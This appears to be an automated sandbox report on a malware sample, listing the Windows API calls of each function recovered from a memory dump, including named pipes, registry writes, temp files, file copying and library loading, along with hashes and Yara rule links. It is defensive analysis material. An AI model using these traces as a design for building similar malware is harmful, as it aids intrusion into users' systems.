                                                            • wsprintfA.USER32 ref: 0458370E
                                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,04572FCF), ref: 04583719
                                                              • Part of subcall function 0456A6F7: lstrlen.KERNEL32(045647C4,00000000,00000000,?,?,?,045647C4,00000035,00000000,-00000005,00000000), ref: 0456A727
                                                              • Part of subcall function 0456A6F7: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0456A73D
                                                              • Part of subcall function 0456A6F7: memcpy.NTDLL(00000010,045647C4,00000000,?,?,045647C4,00000035,00000000), ref: 0456A773
                                                              • Part of subcall function 0456A6F7: memcpy.NTDLL(00000010,00000000,00000035,?,?,045647C4,00000035), ref: 0456A78E
                                                              • Part of subcall function 0456A6F7: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 0456A7AC
                                                              • Part of subcall function 0456A6F7: GetLastError.KERNEL32(?,?,045647C4,00000035), ref: 0456A7B6
                                                              • Part of subcall function 0456A6F7: HeapFree.KERNEL32(00000000,00000000,?,?,045647C4,00000035), ref: 0456A7D9
                                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,?,04572FCF), ref: 04583730
                                                            • HeapFree.KERNEL32(00000000,?,?,00000001,00000000,?,00000001,045863D8,00000002,?,?), ref: 04583740
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$Allocate$lstrlen$QueryValuememcpywsprintf$CallCloseErrorLastNamedPipe
                                                            • String ID:
                                                            • API String ID: 3733591251-0
                                                            • Opcode ID: da6d53960b3f3a74067ffe97c75281768aeba23315356fe6e92e76f606464f70
                                                            • Instruction ID: 470df7b3783f0b7559dcc45144ccc78d72f7fd89aefcaf3908d39eeb9eb3d0d7
                                                            • Opcode Fuzzy Hash: da6d53960b3f3a74067ffe97c75281768aeba23315356fe6e92e76f606464f70
                                                            • Instruction Fuzzy Hash: A4814CB1900216EFDB20AF95EC84DAEBBB9FB04744B00042DF911B7250DF36AE45EB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04567BCD, Relevance: 21.2, APIs: 14, Instructions: 206memorystringthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • StrChrA.SHLWAPI(?,0000002C), ref: 04567C1C
                                                            • StrTrimA.SHLWAPI(00000001,?), ref: 04567C35
                                                            • StrChrA.SHLWAPI(?,0000002C), ref: 04567C40
                                                            • StrTrimA.SHLWAPI(00000001,?), ref: 04567C59
                                                            • lstrlen.KERNEL32(?,?,00000001,?,?), ref: 04567CFC
                                                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04567D1E
                                                            • lstrcpy.KERNEL32(00000020,?), ref: 04567D3D
                                                            • lstrlen.KERNEL32(?), ref: 04567D47
                                                            • memcpy.NTDLL(?,?,?), ref: 04567D88
                                                            • memcpy.NTDLL(?,?,?), ref: 04567D9B
                                                            • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 04567DBF
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04567DE1
                                                            • HeapFree.KERNEL32(00000000,?,?,00000001,?,?), ref: 04567E07
                                                            • HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?), ref: 04567E23
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 3323474148-0
                                                            • Opcode ID: c3212897b67c89254d1eeed4446af8ab6842061719b23fc05b5bd4d19316e06d
                                                            • Instruction ID: 737338055c4431d27d2b962aa36e8e2a24c7de0dde11b5d3cb15541cf50aac69
                                                            • Opcode Fuzzy Hash: c3212897b67c89254d1eeed4446af8ab6842061719b23fc05b5bd4d19316e06d
                                                            • Instruction Fuzzy Hash: 28715A71504702EFD721DF25D884A5BBBE8FF48318F04492EF59AA3250DB35E948EB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04567BCB, Relevance: 21.2, APIs: 14, Instructions: 175memorystringthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • StrChrA.SHLWAPI(?,0000002C), ref: 04567C1C
                                                            • StrTrimA.SHLWAPI(00000001,?), ref: 04567C35
                                                            • StrChrA.SHLWAPI(?,0000002C), ref: 04567C40
                                                            • StrTrimA.SHLWAPI(00000001,?), ref: 04567C59
                                                            • lstrlen.KERNEL32(?,?,00000001,?,?), ref: 04567CFC
                                                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04567D1E
                                                            • lstrcpy.KERNEL32(00000020,?), ref: 04567D3D
                                                            • lstrlen.KERNEL32(?), ref: 04567D47
                                                            • memcpy.NTDLL(?,?,?), ref: 04567D88
                                                            • memcpy.NTDLL(?,?,?), ref: 04567D9B
                                                            • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 04567DBF
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04567DE1
                                                            • HeapFree.KERNEL32(00000000,?,?,00000001,?,?), ref: 04567E07
                                                            • HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?), ref: 04567E23
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 3323474148-0
                                                            • Opcode ID: 94c83a74f71fa44734551ffbf182f4e49899bdaa936743901f47e52ecbf95176
                                                            • Instruction ID: 6447f1c80fd465f257d57ca32e39daca3fb86554ecbe2ea0acaf54a1fa8cbc53
                                                            • Opcode Fuzzy Hash: 94c83a74f71fa44734551ffbf182f4e49899bdaa936743901f47e52ecbf95176
                                                            • Instruction Fuzzy Hash: 9E516D71504301EFD721DF25D844A5ABBE8FB48318F04492EF596E3251DB35E948EB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457BB2F, Relevance: 21.2, APIs: 14, Instructions: 161memorystringfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(?,?,00000000), ref: 0457BB46
                                                            • lstrlen.KERNEL32(?,?,00000000), ref: 0457BB4D
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0457BB64
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 0457BB75
                                                            • lstrcat.KERNEL32(?,?), ref: 0457BB91
                                                            • lstrcat.KERNEL32(?,?), ref: 0457BBA2
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0457BBB3
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0457BC50
                                                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 0457BC89
                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0457BCA2
                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 0457BCAC
                                                            • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0457BCBC
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0457BCD5
                                                            • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0457BCE5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                                                            • String ID:
                                                            • API String ID: 333890978-0
                                                            • Opcode ID: fe07459be820c0cad93e4ad36ac8cc4458159bd87e5977447618794074714546
                                                            • Instruction ID: ed04c40863a7dcb3affe075998d3ad88361bf341869414e58d12a456601b3ff7
                                                            • Opcode Fuzzy Hash: fe07459be820c0cad93e4ad36ac8cc4458159bd87e5977447618794074714546
                                                            • Instruction Fuzzy Hash: 39518B72400109FFCB019FA4EC84CAE7BBDFB48348B158029F615A7211DE39AE49EF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04576687, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 128timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wsprintfA.USER32 ref: 045766C9
                                                            • OpenWaitableTimerA.KERNEL32(00100000,00000000,?), ref: 045766DC
                                                            • CloseHandle.KERNEL32(00000000), ref: 045767F4
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • memset.NTDLL ref: 045766FF
                                                            • memcpy.NTDLL(?,000493E0,00000010,?,?,00000040), ref: 0457677E
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04576793
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 045767AB
                                                            • GetLastError.KERNEL32(045754DA,?,?,?,?,?,?,?,00000040), ref: 045767C3
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 045767CF
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 045767DE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave$AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
                                                            • String ID: 0x%08X$W
                                                            • API String ID: 1559661116-2600449260
                                                            • Opcode ID: 16937818ea72cc4bcca1bb22065ef13a8a48a7fd57187ffe22cd14de46afc4e5
                                                            • Instruction ID: 883f08439e3e9ad43b340fc012bffb7dca0617d3977ed2b2ab9fa32d01d08d05
                                                            • Opcode Fuzzy Hash: 16937818ea72cc4bcca1bb22065ef13a8a48a7fd57187ffe22cd14de46afc4e5
                                                            • Instruction Fuzzy Hash: 14417FB1900609EFDB10DFA4D884A9EBBF8FF08354F108529F559E7240D775EA54EB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04577E67, Relevance: 21.1, APIs: 14, Instructions: 107libraryloaderstringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00000000,?,?,?,0457CCC5,?,?), ref: 04577E74
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0457CCC5,?,?), ref: 04577E9D
                                                            • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 04577EBD
                                                            • lstrcpyW.KERNEL32(-00000002,?), ref: 04577ED8
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,0457CCC5,?,?), ref: 04577EE4
                                                            • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,0457CCC5,?,?), ref: 04577EE7
                                                            • SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,0457CCC5,?,?), ref: 04577EF3
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04577F10
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04577F2A
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04577F40
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04577F56
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04577F6C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04577F82
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0457CCC5,?,?), ref: 04577FAB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                                                            • String ID:
                                                            • API String ID: 3772355505-0
                                                            • Opcode ID: 78d213038d3914bf6f155ac8bdb85f12c28dc73b212656ae437efc83132b4904
                                                            • Instruction ID: cc678fc1f803abc265805e45ac084818a45b1a4e38b5d11d0bd0aab31bf0a671
                                                            • Opcode Fuzzy Hash: 78d213038d3914bf6f155ac8bdb85f12c28dc73b212656ae437efc83132b4904
                                                            • Instruction Fuzzy Hash: 223127B150120BEFD710DF65ED88D667BECFF09344B049529F909E7211EB39E809ABA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045780E4, Relevance: 21.1, APIs: 14, Instructions: 79stringmemoryfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,00000000,?,?,?,045612BE,?,?,?), ref: 045780FB
                                                            • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,045612BE,?,?,?), ref: 04578106
                                                            • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,045612BE,?,?,?), ref: 0457810E
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04578123
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 04578134
                                                            • lstrcatW.KERNEL32(00000000,?), ref: 04578146
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,045612BE,?,?,?), ref: 0457814B
                                                            • lstrcatW.KERNEL32(00000000,045863D0), ref: 04578157
                                                            • lstrcatW.KERNEL32(00000000), ref: 0457815F
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,045612BE,?,?,?), ref: 04578164
                                                            • lstrcatW.KERNEL32(00000000,045863D0), ref: 04578170
                                                            • lstrcatW.KERNEL32(00000000,00000002), ref: 0457818B
                                                            • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,045612BE,?,?,?), ref: 04578193
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,045612BE,?,?,?), ref: 045781A1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                                                            • String ID:
                                                            • API String ID: 3635185113-0
                                                            • Opcode ID: 311f4f9441f9005a782d489eba65f4f7ddc64dbcef6d1b9456f055024ceb9629
                                                            • Instruction ID: a1735b3f8ad1d728fecbdd20982f2f1c11a7894a4ef61739bb9a598b52abea9e
                                                            • Opcode Fuzzy Hash: 311f4f9441f9005a782d489eba65f4f7ddc64dbcef6d1b9456f055024ceb9629
                                                            • Instruction Fuzzy Hash: 3321DC32100216EFC321AF65EC88E6B7BACFF85B90F01042CF545A2251DF69EC09FA65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456B91A, Relevance: 18.2, APIs: 12, Instructions: 196memorystringthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04570E2E: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 04570E73
                                                              • Part of subcall function 04570E2E: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04570E8B
                                                              • Part of subcall function 04570E2E: WaitForSingleObject.KERNEL32(00000000,?,00000000,04572333,00000000,73BCF5B0,0456824E,?,00000001), ref: 04570F53
                                                              • Part of subcall function 04570E2E: HeapFree.KERNEL32(00000000,?,?,00000000,04572333,00000000,73BCF5B0,0456824E,?,00000001), ref: 04570F7C
                                                              • Part of subcall function 04570E2E: HeapFree.KERNEL32(00000000,04572333,?,00000000,04572333,00000000,73BCF5B0,0456824E,?,00000001), ref: 04570F8C
                                                              • Part of subcall function 04570E2E: RegCloseKey.ADVAPI32(00000000,?,00000000,04572333,00000000,73BCF5B0,0456824E,?,00000001), ref: 04570F95
                                                            • lstrcmp.KERNEL32(?,?), ref: 0456B991
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0456B9BD
                                                            • GetCurrentThreadId.KERNEL32 ref: 0456BA6E
                                                            • GetCurrentThread.KERNEL32 ref: 0456BA7F
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,0456C3DA,?,00000001), ref: 0456BABC
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,0456C3DA,?,00000001), ref: 0456BAD0
                                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0456BADE
                                                            • wsprintfA.USER32 ref: 0456BAF6
                                                              • Part of subcall function 04575440: lstrlen.KERNEL32(00000000,00000000,00000000,00000008,04569999,00000000,?,00000000,73B75520,00000000,?,04577991,?,?,?,00000000), ref: 0457544A
                                                              • Part of subcall function 04575440: lstrcpy.KERNEL32(00000000,00000000), ref: 0457546E
                                                              • Part of subcall function 04575440: StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,04577991,?,?,?,00000000,?,00000000,00000000), ref: 04575475
                                                              • Part of subcall function 04575440: lstrcat.KERNEL32(00000000,?), ref: 045754CC
                                                            • lstrlen.KERNEL32(00000000,00000000), ref: 0456BB01
                                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0456BB18
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0456BB29
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0456BB35
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                                                            • String ID:
                                                            • API String ID: 773763258-0
                                                            • Opcode ID: f8056c31e85c2925510d45a137656a84eca9b7db4396d9f53a8ec870de5c7d56
                                                            • Instruction ID: 4eb414c2316a0c55a6fdb6c30af145da39b869aa89cb48a3017fdd65427ad33f
                                                            • Opcode Fuzzy Hash: f8056c31e85c2925510d45a137656a84eca9b7db4396d9f53a8ec870de5c7d56
                                                            • Instruction Fuzzy Hash: E471E371900219EFDB11DFA5E884EAEBBB9FB08314F048069E505F7261DB35B945EBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457C186, Relevance: 18.2, APIs: 12, Instructions: 183synchronizationstringthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0457C1AD
                                                            • memcpy.NTDLL(?,?,00000010), ref: 0457C1D0
                                                            • memset.NTDLL ref: 0457C21C
                                                            • lstrcpyn.KERNEL32(?,?,00000034), ref: 0457C230
                                                            • GetLastError.KERNEL32 ref: 0457C25E
                                                            • GetLastError.KERNEL32 ref: 0457C2A5
                                                            • GetLastError.KERNEL32 ref: 0457C2C4
                                                            • WaitForSingleObject.KERNEL32(?,000927C0), ref: 0457C2FE
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0457C30C
                                                            • GetLastError.KERNEL32 ref: 0457C386
                                                            • ReleaseMutex.KERNEL32(?), ref: 0457C398
                                                            • RtlExitUserThread.NTDLL(?), ref: 0457C3AE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                                                            • String ID:
                                                            • API String ID: 4037736292-0
                                                            • Opcode ID: 237cf8ad78125d4622ed742bd9576eb4640fd88f9b678bf3a82961bc2eec822b
                                                            • Instruction ID: 3f80ee9733881aef926625cbcc0b18730ee5c01655ae324c33f70575720fa1a6
                                                            • Opcode Fuzzy Hash: 237cf8ad78125d4622ed742bd9576eb4640fd88f9b678bf3a82961bc2eec822b
                                                            • Instruction Fuzzy Hash: CF616C71504701AFD721DF65A848A1BB7F9FF84720F008A2DFA96D6180EB75E908EB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04565D7E, Relevance: 18.1, APIs: 12, Instructions: 136stringmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000000), ref: 04565D94
                                                            • lstrlen.KERNEL32(?), ref: 04565D9C
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04565DAC
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 04565DCB
                                                            • lstrlen.KERNEL32(?), ref: 04565DE0
                                                            • lstrlen.KERNEL32(?), ref: 04565DEE
                                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 04565E3C
                                                            • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 04565E60
                                                            • lstrlen.KERNEL32(?), ref: 04565E93
                                                            • HeapFree.KERNEL32(00000000,?,?), ref: 04565EBE
                                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 04565ED5
                                                            • HeapFree.KERNEL32(00000000,?,?), ref: 04565EE2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                                                            • String ID:
                                                            • API String ID: 904523553-0
                                                            • Opcode ID: 99b558b3abef42d8cf9192e445c98b0352f8356141e2339b689ae64890ca8953
                                                            • Instruction ID: 3b42915f564cdfcdbcdbb86e4e0c814de8b8eeac6c9a63c3c44392d560f8aa9a
                                                            • Opcode Fuzzy Hash: 99b558b3abef42d8cf9192e445c98b0352f8356141e2339b689ae64890ca8953
                                                            • Instruction Fuzzy Hash: 2A41487190024AFBDF129FA5EC44AAE7BB9FB44310F108069F912A7250EB35EE55EB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457AD22, Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0457AD54
                                                            • WaitForSingleObject.KERNEL32(000003BC,00000000), ref: 0457AD76
                                                            • ConnectNamedPipe.KERNEL32(?,?), ref: 0457AD96
                                                            • GetLastError.KERNEL32 ref: 0457ADA0
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0457ADC4
                                                            • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,00000010,00000000), ref: 0457AE07
                                                            • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 0457AE10
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 0457AE19
                                                            • CloseHandle.KERNEL32(?), ref: 0457AE2E
                                                            • GetLastError.KERNEL32 ref: 0457AE3B
                                                            • CloseHandle.KERNEL32(?), ref: 0457AE48
                                                            • RtlExitUserThread.NTDLL(000000FF), ref: 0457AE5E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                                                            • String ID:
                                                            • API String ID: 4053378866-0
                                                            • Opcode ID: 5f99d2dd2b33027a9aaf5c50daafd51be5161992e1eac2bae390311541ff3f94
                                                            • Instruction ID: 8305c69a3213e99390a2fbc0308f89c6177b1fd9982d668bb353dcf538bbab9d
                                                            • Opcode Fuzzy Hash: 5f99d2dd2b33027a9aaf5c50daafd51be5161992e1eac2bae390311541ff3f94
                                                            • Instruction Fuzzy Hash: CA316070404305EFEB119F24EC8896FBBA9FB44355F004A3DF565E6090DB74EE09AB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456A5EC, Relevance: 18.1, APIs: 12, Instructions: 94registrymemorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlImageNtHeader.NTDLL(?), ref: 0456A5FD
                                                            • GetTempPathA.KERNEL32(00000000,00000000,?,?,04561E48,?,00000094,00000000,?,?,00000000,?), ref: 0456A615
                                                            • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 0456A624
                                                            • GetTempPathA.KERNEL32(00000001,00000000,?,?,04561E48,?,00000094,00000000,?,?,00000000,?), ref: 0456A637
                                                            • GetTickCount.KERNEL32 ref: 0456A63B
                                                            • wsprintfA.USER32 ref: 0456A652
                                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0456A68D
                                                            • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 0456A6AA
                                                            • lstrlen.KERNEL32(00000000), ref: 0456A6B4
                                                            • RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 0456A6C4
                                                            • RegCloseKey.ADVAPI32(?), ref: 0456A6D0
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 0456A6DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
                                                            • String ID:
                                                            • API String ID: 3778301466-0
                                                            • Opcode ID: ba5e3516eff86ef9a09b165b21ba52dcbd1c93394c12081f51203e439ac46e9a
                                                            • Instruction ID: 7723d191480eeaa3068ca7e0e41913c96db2118cede9dc02ed4acbdd4366b2c1
                                                            • Opcode Fuzzy Hash: ba5e3516eff86ef9a09b165b21ba52dcbd1c93394c12081f51203e439ac46e9a
                                                            • Instruction Fuzzy Hash: 82316971400219FFDB119FA5DC88DAF7BACFF45394B005029F906E7101DA38AE49EBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045778F6, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120memorythreadstringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlImageNtHeader.NTDLL(?), ref: 04577920
                                                            • GetCurrentThreadId.KERNEL32 ref: 04577936
                                                            • GetCurrentThread.KERNEL32 ref: 04577947
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000), ref: 045790FF
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579118
                                                              • Part of subcall function 045790ED: GetCurrentThreadId.KERNEL32 ref: 04579125
                                                              • Part of subcall function 045790ED: GetSystemTimeAsFileTime.KERNEL32(0456EE33,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579131
                                                              • Part of subcall function 045790ED: GetTempFileNameA.KERNEL32(00000000,00000000,0456EE33,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?), ref: 0457913F
                                                              • Part of subcall function 045790ED: lstrcpy.KERNEL32(00000000), ref: 04579161
                                                              • Part of subcall function 0456997D: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,?,00000000,73B75520,00000000,?,04577991,?,?,?,00000000), ref: 045699E8
                                                              • Part of subcall function 0456997D: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,?,00000000,73B75520,00000000,?,04577991,?,?,?,00000000), ref: 04569A10
                                                            • HeapFree.KERNEL32(00000000,?,04561F4D,?,?,?,?,?,00000000,?,00000000,00000000,?), ref: 045779C1
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000,?,00000000,00000000,?), ref: 045779CD
                                                            • RtlAllocateHeap.NTDLL(00000000,00000400,00000000), ref: 04577A1C
                                                            • wsprintfA.USER32 ref: 04577A34
                                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,04561F4D), ref: 04577A3F
                                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,?,04561F4D), ref: 04577A56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                                                            • String ID: W
                                                            • API String ID: 630447368-655174618
                                                            • Opcode ID: 658b5a693c7b197dbbe1103244de80970761efc6b6753f6319c6acd8d239ee06
                                                            • Instruction ID: 46f5833344af4d9915c2abec69671e9efc8c48cca1f0640358816e74dc3ed8b3
                                                            • Opcode Fuzzy Hash: 658b5a693c7b197dbbe1103244de80970761efc6b6753f6319c6acd8d239ee06
                                                            • Instruction Fuzzy Hash: E9415A7590111AFBEB119FA1EC88DAE7FB9FF48344F104429F905A6210DB34BA54EBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04582A44, Relevance: 16.7, APIs: 11, Instructions: 155registrystringfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04582A6F
                                                              • Part of subcall function 0457B801: RegCloseKey.ADVAPI32(?,04566C27), ref: 0457B888
                                                            • RegOpenKeyA.ADVAPI32(80000001,04566C27,?), ref: 04582AAA
                                                            • lstrcpyW.KERNEL32(-00000002,B70FF003), ref: 04582B0B
                                                            • lstrcatW.KERNEL32(00000000,?), ref: 04582B20
                                                            • lstrcpyW.KERNEL32(?), ref: 04582B3A
                                                            • lstrcatW.KERNEL32(00000000,?), ref: 04582B49
